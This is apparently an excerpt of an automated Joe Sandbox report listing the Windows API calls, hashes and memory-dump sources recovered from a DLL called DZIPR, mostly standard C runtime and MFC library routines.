                                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6C53C168), ref: 6C516300
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 2c82f8ba8fb648fc44881433e7a830a24dc66878116422a9f94d92a3e2be3af5
                                          • Instruction ID: 27cbcc40b06836ee1fe37b93d85e232735b23634e27611021d305dad54894460
                                          • Opcode Fuzzy Hash: 2c82f8ba8fb648fc44881433e7a830a24dc66878116422a9f94d92a3e2be3af5
                                          • Instruction Fuzzy Hash: 4731EE31A0C7458FD708CF08C88866AB7E2EFC4318F19C96CE88597B16EA30F855CB81

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 6C51C057
                                            • Part of subcall function 6C516DC1: __CxxThrowException@8.LIBCMT ref: 6C516DD7
                                            • Part of subcall function 6C516DC1: __EH_prolog3.LIBCMT ref: 6C516DE4
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: H_prolog3$Exception@8Throw
                                          • String ID:
                                          • API String ID: 2489616738-0
                                          • Opcode ID: 5a5b970ab08a0be171ea2d8ec033d159e8a3c6470d4404ef61fb843d685c9c21
                                          • Instruction ID: 27c1d0ac4230614d972670be3644dda59667b227222894c048c45ce24e8540ac
                                          • Opcode Fuzzy Hash: 5a5b970ab08a0be171ea2d8ec033d159e8a3c6470d4404ef61fb843d685c9c21
                                          • Instruction Fuzzy Hash: 20015A70709212CBEB18BE728C193AD76B2AB81359F11853CD4528BFA0DF32DD45CB50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000004,00000080,00000000), ref: 6C5160F6
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: e41cf0a8099545f01e29b96a94d6ae051ca3b600784915296890baf23fbbaa1d
                                          • Instruction ID: f4e72700e4622929da1f23835defaabf8f1a22db8a8e3f20e37a6f6e8653a7d7
                                          • Opcode Fuzzy Hash: e41cf0a8099545f01e29b96a94d6ae051ca3b600784915296890baf23fbbaa1d
                                          • Instruction Fuzzy Hash: 4F01E8B4A087019FC718DF0AC89090ABBF6FFC8308F16852DA84897316C630E851CF89

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          APIs
                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6C524776,00000001,?,?,?,6C5248EF,?,?,?,6C53E848,0000000C,6C5249AA), ref: 6C52A709
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CreateHeap
                                          • String ID:
                                          • API String ID: 10892065-0
                                          • Opcode ID: 04dc7ebb1a01d995da2076b772324e92507488c78fe2b36077ccc0c593f48663
                                          • Instruction ID: 86b28a3b87f8e373c7020ecf6a80ca6d0ecadef41e706e607c30112d9e21a0fc
                                          • Opcode Fuzzy Hash: 04dc7ebb1a01d995da2076b772324e92507488c78fe2b36077ccc0c593f48663
                                          • Instruction Fuzzy Hash: 5BD05E326543449ADB10AEB15C48B263BFC938579AF198836F80DCA180F574C5909A48
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 6C517498
                                          • GetFullPathNameW.KERNEL32(00000000,00000104,00000000,?,00000268,6C5176D5,?,00000000,?,00000000,00000104,00000000,?,6C53BEF4,00000000), ref: 6C5174D6
                                            • Part of subcall function 6C516DC1: __CxxThrowException@8.LIBCMT ref: 6C516DD7
                                            • Part of subcall function 6C516DC1: __EH_prolog3.LIBCMT ref: 6C516DE4
                                          • PathIsUNCW.SHLWAPI(?,00000000,?), ref: 6C517546
                                          • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6C51756D
                                          • CharUpperW.USER32(00000000), ref: 6C5175A0
                                          • FindFirstFileW.KERNEL32(?,?), ref: 6C5175BC
                                          • FindClose.KERNEL32(00000000), ref: 6C5175C8
                                          • lstrlenW.KERNEL32(?), ref: 6C5175E6
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
                                          • String ID:
                                          • API String ID: 624941980-0
                                          • Opcode ID: 8e5a2c17a4308308c9243fe3d013a72c3c3f313923e41d8dd8cf738ee3a7d9d1
                                          • Instruction ID: 5d4ac99be29dfa60d2e3e7620d0c3929713042868e21ab920bca9264e25b9e9c
                                          • Opcode Fuzzy Hash: 8e5a2c17a4308308c9243fe3d013a72c3c3f313923e41d8dd8cf738ee3a7d9d1
                                          • Instruction Fuzzy Hash: 1D41A47090D2159BEF249F69CC8CBAE7B78AF41358F1006D9E81991E91DB758E88CF21
                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 6C527C6C
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C527C81
                                          • UnhandledExceptionFilter.KERNEL32(6C53A4B8), ref: 6C527C8C
                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 6C527CA8
                                          • TerminateProcess.KERNEL32(00000000), ref: 6C527CAF
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                          • String ID:
                                          • API String ID: 2579439406-0
                                          • Opcode ID: d58b94cb6722b9148172c2d7956d3116a74497941e88f95e104a0ac282d9fec0
                                          • Instruction ID: 572f31b802f603751e02f7023b8562608e96bc7411e5b605d6fe67f00d7f3e57
                                          • Opcode Fuzzy Hash: d58b94cb6722b9148172c2d7956d3116a74497941e88f95e104a0ac282d9fec0
                                          • Instruction Fuzzy Hash: 6D21FFB470A204DFDB41EF25CC486493BB4BB4A308F92901BE5089B390E7B499848F49
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000800,00000003,?,00000004), ref: 6C5189FC
                                          • __snwprintf_s.LIBCMT ref: 6C518A2E
                                          • LoadLibraryW.KERNEL32(?), ref: 6C518A69
                                            • Part of subcall function 6C525348: __getptd_noexit.LIBCMT ref: 6C525348
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
                                          • String ID: LOC
                                          • API String ID: 3175857669-519433814
                                          • Opcode ID: 71f98693fd40b945e6c3fdcda655c09a3438139325c37d5467ad5f8b494df325
                                          • Instruction ID: b5f631ad7d46397184f89cead4035ba868ae97fa48a09172bdbea4e6f519a5fe
                                          • Opcode Fuzzy Hash: 71f98693fd40b945e6c3fdcda655c09a3438139325c37d5467ad5f8b494df325
                                          • Instruction Fuzzy Hash: 8D11DA71A44308EBEB21AB64CC48BDE77FDEB41368F510466E114A7EC0DB789E08D762
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 6C518BE9
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6C518EB7,?,?), ref: 6C518C19
                                          • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6C518C2D
                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6C518C69
                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6C518C77
                                          • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6C518C94
                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6C518CBF
                                          • ConvertDefaultLocale.KERNEL32(000003FF), ref: 6C518CC8
                                          • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 6C518CE1
                                          • EnumResourceLanguagesW.KERNEL32(00000000,00000010,00000001,Function_000084C0,?), ref: 6C518CFE
                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6C518D31
                                          • ConvertDefaultLocale.KERNEL32(00000000), ref: 6C518D3A
                                          • GetModuleFileNameW.KERNEL32(6C510000,?,00000105), ref: 6C518D7F
                                          • _memset.LIBCMT ref: 6C518D9F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Similarity
                                          • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                                          • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                          • API String ID: 3537336938-2299501126
                                          APIs
                                          • GetModuleHandleW.KERNEL32(USER32,00000000,00000000,76944A40,6C51DE36,?,?,?,?,?,?,?,6C51FCC6,00000000,00000002,00000028), ref: 6C51DCF9
                                          • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 6C51DD15
                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C51DD2A
                                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 6C51DD3B
                                          • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 6C51DD4C
                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 6C51DD5D
                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 6C51DD6E
                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 6C51DD8E
                                          Strings
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                          • API String ID: 667068680-2451437823
                                          APIs
                                          • GetParent.USER32(?), ref: 6C51FC05
                                          • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6C51FC28
                                          • GetWindowRect.USER32(?,?), ref: 6C51FC42
                                          • CopyRect.USER32(?,?), ref: 6C51FCA5
                                          • CopyRect.USER32(?,?), ref: 6C51FCAF
                                          • GetWindowRect.USER32(00000000,?), ref: 6C51FCB8
                                            • Part of subcall function 6C51DE96: MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6C51DED6
                                          • CopyRect.USER32(?,?), ref: 6C51FCD4
                                          Strings
                                          Similarity
                                          • API ID: Rect$Copy$Window$ByteCharMessageMultiParentSendWide
                                          • String ID: (
                                          • API String ID: 2332539329-3887548279
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6C53E928,0000000C,6C52A25A,00000000,00000000,?,6C52A5D4,00000000,00000001,00000000,?,6C52A89E,00000018,6C53E978,0000000C), ref: 6C52A131
                                          • __crt_waiting_on_module_handle.LIBCMT ref: 6C52A13C
                                            • Part of subcall function 6C525BCF: Sleep.KERNEL32(000003E8,00000000,?,6C52A082,KERNEL32.DLL,?,?,6C52A416,00000000,?,6C52488C,00000000,?,?,?,6C5248EF), ref: 6C525BDB
                                            • Part of subcall function 6C525BCF: GetModuleHandleW.KERNEL32(00000000,?,6C52A082,KERNEL32.DLL,?,?,6C52A416,00000000,?,6C52488C,00000000,?,?,?,6C5248EF,?), ref: 6C525BE4
                                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 6C52A165
                                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 6C52A175
                                          • __lock.LIBCMT ref: 6C52A197
                                          • InterlockedIncrement.KERNEL32(?), ref: 6C52A1A4
                                          • __lock.LIBCMT ref: 6C52A1B8
                                          • ___addlocaleref.LIBCMT ref: 6C52A1D6
                                          Strings
                                          Similarity
                                          • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                          • String ID: $Tl$DecodePointer$EncodePointer$KERNEL32.DLL
                                          • API String ID: 1028249917-2572227779
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32), ref: 6C518503
                                          • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6C518520
                                          • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 6C51852D
                                          • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 6C51853A
                                          • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 6C518547
                                          Strings
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                          • API String ID: 667068680-2424895508
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32,6C51A6B6), ref: 6C51A5AA
                                          • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6C51A5CB
                                          • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6C51A5DD
                                          • GetProcAddress.KERNEL32(ActivateActCtx), ref: 6C51A5EF
                                          • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6C51A601
                                            • Part of subcall function 6C516DC1: __CxxThrowException@8.LIBCMT ref: 6C516DD7
                                            • Part of subcall function 6C516DC1: __EH_prolog3.LIBCMT ref: 6C516DE4
                                          Strings
                                          Similarity
                                          • API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
                                          • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                          • API String ID: 417325364-2424895508
                                          APIs
                                          • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,?,?,6C511BE9,?,?,?,?), ref: 6C511C39
                                          • GetLastError.KERNEL32(?,?,?,?,?,6C511BE9,?,?,?,?), ref: 6C511C48
                                          • __aullrem.LIBCMT ref: 6C511C60
                                          • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000), ref: 6C511CE8
                                          • _memset.LIBCMT ref: 6C511CF5
                                          • SetFilePointer.KERNEL32(?,?,00000000,00000001,?,?,?,?,6C511BE9,?,?,?,?), ref: 6C511D07
                                          Similarity
                                          • API ID: File$Pointer$ErrorLastRead__aullrem_memset
                                          • String ID:
                                          • API String ID: 123228641-0
                                          APIs
                                          • __EH_prolog3_catch.LIBCMT ref: 6C51BE14
                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 6C51BE25
                                          • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,6C51AF00,6C516DDD,6C5168AD,?,6C524902,?,?,?,?), ref: 6C51BE43
                                          • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,6C51AF00,6C516DDD,6C5168AD,?,6C524902,?), ref: 6C51BE77
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 6C51BEE3
                                          • _memset.LIBCMT ref: 6C51BF02
                                          • TlsSetValue.KERNEL32(?,00000000), ref: 6C51BF13
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6C51BF34
                                          Similarity
                                          • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                          • String ID:
                                          • API String ID: 1891723912-0
                                          APIs
                                            • Part of subcall function 6C51815A: GetParent.USER32(?), ref: 6C5181AE
                                            • Part of subcall function 6C51815A: GetLastActivePopup.USER32(?), ref: 6C5181BF
                                            • Part of subcall function 6C51815A: IsWindowEnabled.USER32(?), ref: 6C5181D3
                                            • Part of subcall function 6C51815A: EnableWindow.USER32(?,00000000), ref: 6C5181E6
                                          • EnableWindow.USER32(?,00000001), ref: 6C518247
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 6C51825B
                                          • GetCurrentProcessId.KERNEL32(?,?), ref: 6C518265
                                          • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 6C51827D
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 6C5182F9
                                          • EnableWindow.USER32(00000000,00000001), ref: 6C518340
                                          Strings
                                          Similarity
                                          • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                          • String ID: 8mQl
                                          • API String ID: 1877664794-3010467399
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6C51DED6
                                          • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 6C51DF00
                                          • GetSystemMetrics.USER32(00000000), ref: 6C51DF17
                                          • GetSystemMetrics.USER32(00000001), ref: 6C51DF1E
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,-00000028,00000020), ref: 6C51DF49
                                          Strings
                                          Similarity
                                          • API ID: System$ByteCharMetricsMultiWide$InfoParameters
                                          • String ID: B$DISPLAY
                                          • API String ID: 381819527-3316187204
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 6C51D0AE
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6C51D0D1
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6C51D0ED
                                          • RegCloseKey.ADVAPI32(?), ref: 6C51D0FD
                                          • RegCloseKey.ADVAPI32(?), ref: 6C51D107
                                          Strings
                                          Similarity
                                          • API ID: CloseCreate$Open
                                          • String ID: software
                                          • API String ID: 1740278721-2010147023
                                          APIs
                                          • __getptd.LIBCMT ref: 6C52FE1A
                                            • Part of subcall function 6C52A27F: __getptd_noexit.LIBCMT ref: 6C52A282
                                            • Part of subcall function 6C52A27F: __amsg_exit.LIBCMT ref: 6C52A28F
                                          • __amsg_exit.LIBCMT ref: 6C52FE3A
                                          • __lock.LIBCMT ref: 6C52FE4A
                                          • InterlockedDecrement.KERNEL32(?), ref: 6C52FE67
                                          • InterlockedIncrement.KERNEL32(02AC28D8), ref: 6C52FE92
                                          Strings
                                          Similarity
                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                          • String ID: $Tl
                                          • API String ID: 4271482742-618736445
                                          APIs
                                          • SetErrorMode.KERNEL32(00000000), ref: 6C51CA85
                                          • SetErrorMode.KERNEL32(00000000), ref: 6C51CA8D
                                            • Part of subcall function 6C51A698: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6C51A6D0
                                            • Part of subcall function 6C51A698: SetLastError.KERNEL32(0000006F), ref: 6C51A6E7
                                          • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C51CADC
                                          • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 6C51CAEC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Error$ModeModule$AddressFileHandleLastNameProc
                                          • String ID: NotifyWinEvent$user32.dll
                                          • API String ID: 1146408833-597752486
                                          APIs
                                          • GetSysColor.USER32(0000000F), ref: 6C51CD2E
                                          • GetSysColor.USER32(00000010), ref: 6C51CD35
                                          • GetSysColor.USER32(00000014), ref: 6C51CD3C
                                          • GetSysColor.USER32(00000012), ref: 6C51CD43
                                          • GetSysColor.USER32(00000006), ref: 6C51CD4A
                                          • GetSysColorBrush.USER32(0000000F), ref: 6C51CD57
                                          • GetSysColorBrush.USER32(00000006), ref: 6C51CD5E
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Color$Brush
                                          • String ID:
                                          • API String ID: 2798902688-0
                                          APIs
                                          • __CreateFrameInfo.LIBCMT ref: 6C52C43E
                                            • Part of subcall function 6C524FC4: __getptd.LIBCMT ref: 6C524FD2
                                            • Part of subcall function 6C524FC4: __getptd.LIBCMT ref: 6C524FE0
                                          • __getptd.LIBCMT ref: 6C52C448
                                            • Part of subcall function 6C52A27F: __getptd_noexit.LIBCMT ref: 6C52A282
                                            • Part of subcall function 6C52A27F: __amsg_exit.LIBCMT ref: 6C52A28F
                                          • __getptd.LIBCMT ref: 6C52C456
                                          • __getptd.LIBCMT ref: 6C52C464
                                          • __getptd.LIBCMT ref: 6C52C46F
                                          • _CallCatchBlock2.LIBCMT ref: 6C52C495
                                            • Part of subcall function 6C525069: __CallSettingFrame@12.LIBCMT ref: 6C5250B5
                                            • Part of subcall function 6C52C53C: __getptd.LIBCMT ref: 6C52C54B
                                            • Part of subcall function 6C52C53C: __getptd.LIBCMT ref: 6C52C559
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                          • String ID:
                                          • API String ID: 1602911419-0
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: _memset
                                          • String ID: @$@$AfxFrameOrView90su$AfxMDIFrame90su
                                          • API String ID: 2102423945-1093365818
                                          APIs
                                            • Part of subcall function 6C51C220: RtlEnterCriticalSection.NTDLL(6C5434A8), ref: 6C51C25A
                                            • Part of subcall function 6C51C220: RtlInitializeCriticalSection.NTDLL(?), ref: 6C51C26C
                                            • Part of subcall function 6C51C220: RtlLeaveCriticalSection.NTDLL(6C5434A8), ref: 6C51C279
                                            • Part of subcall function 6C51C220: RtlEnterCriticalSection.NTDLL(?), ref: 6C51C289
                                            • Part of subcall function 6C51BB0C: __EH_prolog3_catch.LIBCMT ref: 6C51BB13
                                            • Part of subcall function 6C516DC1: __CxxThrowException@8.LIBCMT ref: 6C516DD7
                                            • Part of subcall function 6C516DC1: __EH_prolog3.LIBCMT ref: 6C516DE4
                                          • GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 6C521458
                                          • FreeLibrary.KERNEL32(?), ref: 6C521468
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                          • String ID: (QTl$HtmlHelpW$hhctrl.ocx
                                          • API String ID: 2853499158-1688265336
                                          APIs
                                          • __getptd.LIBCMT ref: 6C52C17F
